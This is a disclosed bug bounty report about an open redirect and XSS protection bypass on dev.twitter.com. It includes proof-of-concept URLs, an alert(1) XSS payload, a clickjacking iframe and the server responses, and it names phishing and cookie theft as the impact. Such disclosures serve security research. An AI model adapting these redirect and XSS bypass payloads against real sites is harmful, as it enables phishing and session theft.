Loading HuntDB...

[dev.twitter.com] XSS and Open Redirect Protection Bypass

Medium
X
X (Formerly Twitter)
Submitted None
Reported by bywalks

Vulnerability Details

Technical details and impact analysis

Description: Hi after I finish reading the report https://hackerone.com/reports/260744.i start to test this subdomain.i fount an interesting url [https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/basics/adding-international-support-to-your-apps].this url is special,my intuition tells me that this URL may have a problem.so,i try test,amzing i found a way to bypass protection. PoC: Open Redirect https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/ HTTP Response: HTTP/1.1 302 Found location: http://www.bywalks.com ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>Redirecting...</title> <h1>Redirecting...</h1> <p>You should be redirected automatically to target URL: <a href="http://www.bywalks.com">http://www.bywalks.com</a>. If not click the link. PoC: XSS https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/blocked:alert(1)/ HTTP Response: HTTP/1.1 302 Found location: blocked:alert(1) ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <title>Redirecting...</title> <h1>Redirecting...</h1> <p>You should be redirected automatically to target URL: <a href="blocked:alert(1)">blocked:alert(1)</a>. If not click the link. PoC: ClickJacking <iframe src="https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/" sandbox="allow-forms"></iframe> ## Impact go fishing.steal cookie,etc

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1120.00

Submitted